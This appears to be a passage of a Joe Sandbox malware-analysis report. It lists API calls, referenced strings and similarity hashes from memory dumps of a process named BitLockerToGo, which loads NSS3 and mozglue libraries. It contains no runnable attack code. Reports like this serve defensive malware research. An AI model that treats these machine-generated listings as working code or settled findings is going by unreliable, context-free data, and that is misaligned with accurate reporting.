                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 600bba5d181b268f0ca71ecd1393335ef2d7e50fcd1c2f6b891f2a1f13b74b7f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 81e94afeb7b10dafa99526643b5f5091c1c0be4feaf9f905a21ea51a21f2eb9f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 600bba5d181b268f0ca71ecd1393335ef2d7e50fcd1c2f6b891f2a1f13b74b7f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DB1C175A00206AFDB01EF68E885BAE77B4BF09318F094124ED1597B51EB34F9A4CBD1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CB26BF7), ref: 6CB26EB6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: TlsGetValue.KERNEL32(00000040,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81267
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: EnterCriticalSection.KERNEL32(?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA8127C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA81291
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA81240: PR_Unlock.NSS3(?,?,?,?,6CA8116C,NSPR_LOG_MODULES), ref: 6CA812A0
                                                                                                                                                                                                                                                                                                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CBCFC0A,6CB26BF7), ref: 6CB26ECD
                                                                                                                                                                                                                                                                                                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CB26EE0
                                                                                                                                                                                                                                                                                                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CB26EFC
                                                                                                                                                                                                                                                                                                                    • PR_NewLock.NSS3 ref: 6CB26F04
                                                                                                                                                                                                                                                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB26F18
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CB26BF7), ref: 6CB26F30
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CB26BF7), ref: 6CB26F54
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CB26BF7), ref: 6CB26FE0
                                                                                                                                                                                                                                                                                                                    • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CB26BF7), ref: 6CB26FFD
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • SSLFORCELOCKS, xrefs: 6CB26F2B
                                                                                                                                                                                                                                                                                                                    • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CB26FDB
                                                                                                                                                                                                                                                                                                                    • SSLKEYLOGFILE, xrefs: 6CB26EB1
                                                                                                                                                                                                                                                                                                                    • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CB26F4F
                                                                                                                                                                                                                                                                                                                    • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CB26FF8
                                                                                                                                                                                                                                                                                                                    • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CB26EF7
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                                                                                    • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                                                                                    • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b309e8789896ed391f567787daee472658b77753eccfc6ff6d157922c859a40
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e7aaaedec68aeafe9964d3ad90e25a6c7b0075e08d44238b82449d09319ba95c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b309e8789896ed391f567787daee472658b77753eccfc6ff6d157922c859a40
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CA129B2A658D087EB10463CEC007B937E1AB83339F584365E839D7FD4DBBD94418256
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA98E5B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CA98E81
                                                                                                                                                                                                                                                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA98EED
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CBC18D0,?), ref: 6CA98F03
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CA98F19
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CA98F2B
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA98F53
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA98F65
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CA98FA1
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(?), ref: 6CA98FFE
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CA99012
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CA99024
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CA9902C
                                                                                                                                                                                                                                                                                                                    • PORT_DestroyCheapArena.NSS3(?), ref: 6CA9903E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                                                                                                                    • String ID: security
                                                                                                                                                                                                                                                                                                                    • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB5CC7B), ref: 6CB5CD7A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB5CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CACC1A8,?), ref: 6CB5CE92
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB5CDA5
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB5CDB8
                                                                                                                                                                                                                                                                                                                    • PR_UnloadLibrary.NSS3(00000000), ref: 6CB5CDDB
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB5CD8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA805C0: PR_EnterMonitor.NSS3 ref: 6CA805D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA805C0: PR_ExitMonitor.NSS3 ref: 6CA805EA
                                                                                                                                                                                                                                                                                                                    • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB5CDE8
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB5CDFF
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB5CE16
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB5CE29
                                                                                                                                                                                                                                                                                                                    • PR_UnloadLibrary.NSS3(00000000), ref: 6CB5CE48
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                                                                                    • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C973217
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C973236
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: FreeLibrary.KERNEL32 ref: 6C97324B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: __Init_thread_footer.LIBCMT ref: 6C973260
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C97327F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C97328E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9732AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9732D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9732E5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9732F7
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C989675
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C989697
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9896E8
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C989707
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98971F
                                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C989773
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9897B7
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C9897D0
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C9897EB
                                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C989824
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3e9c516aaf32f34f52c933af01da807c0bf2a0de44e21ab0e0de6f84ed66350
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6356b7e3efdd58ba573dbff7cd5c0bbd756f0aaed52408061c941e8ab07aa334
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e9c516aaf32f34f52c933af01da807c0bf2a0de44e21ab0e0de6f84ed66350
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61C3717093059FDF00CFA8E884B9ABBF5EB4AB18F214919E92597B80D730E845CB91
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBC1DE0,?), ref: 6CAF6CFE
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAF6D26
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CAF6D70
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000480), ref: 6CAF6D82
                                                                                                                                                                                                                                                                                                                    • DER_GetInteger_Util.NSS3(?), ref: 6CAF6DA2
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAF6DD8
                                                                                                                                                                                                                                                                                                                    • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CAF6E60
                                                                                                                                                                                                                                                                                                                    • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CAF6F19
                                                                                                                                                                                                                                                                                                                    • PK11_DigestBegin.NSS3(00000000), ref: 6CAF6F2D
                                                                                                                                                                                                                                                                                                                    • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CAF6F7B
                                                                                                                                                                                                                                                                                                                    • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAF7011
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(00000000), ref: 6CAF7033
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAF703F
                                                                                                                                                                                                                                                                                                                    • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CAF7060
                                                                                                                                                                                                                                                                                                                    • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CAF7087
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CAF70AF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef9735621a81bc5b98d3b417e8c08331f46097a386882e9ec069e26ab21b0159
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a61c9275ee0a37858dda9d87188251a987b2bdcd0eb183e962fb964c86fa1e05
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef9735621a81bc5b98d3b417e8c08331f46097a386882e9ec069e26ab21b0159
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62A1F6729142009BFB009F24DC55B6A32A5DB8131CF284939F979DBB81E775D8CAC793
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF25
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF39
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF51
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF69
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CABB06B
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CABB083
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CABB0A4
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CABB0C1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6CABB0D9
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CABB102
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CABB151
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CABB182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFAB0: free.MOZGLUE(?,-00000001,?,?,6CA8F673,00000000,00000000), ref: 6CAEFAC7
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CABB177
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABB1A2
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABB1AA
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABB1C2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: TlsGetValue.KERNEL32(00000000,?,6CAB0844,?), ref: 6CAE157A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: EnterCriticalSection.KERNEL32(?,?,?,6CAB0844,?), ref: 6CAE158F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: PR_Unlock.NSS3(?,?,?,?,6CAB0844,?), ref: 6CAE15B2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4188828017-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0ADB1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEBE30: SECOID_FindOID_Util.NSS3(6CAA311B,00000000,?,6CAA311B,?), ref: 6CAEBE44
                                                                                                                                                                                                                                                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB0ADF4
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB0AE08
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB0AE25
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3 ref: 6CB0AE63
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CB0AE4D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: TlsGetValue.KERNEL32(?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14C97
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CB0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CC9
                                                                                                                                                                                                                                                                                                                    • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0AE93
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CB0AECC
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3 ref: 6CB0AEDE
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3 ref: 6CB0AEE6
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0AEF5
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3 ref: 6CB0AF16
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                                                                    • String ID: security
                                                                                                                                                                                                                                                                                                                    • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?), ref: 6CAA8E22
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA8E36
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8E4F
                                                                                                                                                                                                                                                                                                                    • calloc.MOZGLUE(00000001,?,?,?), ref: 6CAA8E78
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAA8E9B
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAA8EAC
                                                                                                                                                                                                                                                                                                                    • PL_ArenaAllocate.NSS3(?,?), ref: 6CAA8EDE
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAA8EF0
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8F00
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAA8F0E
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CAA8F39
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8F4A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8F5B
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAA8F72
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAA8F82
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
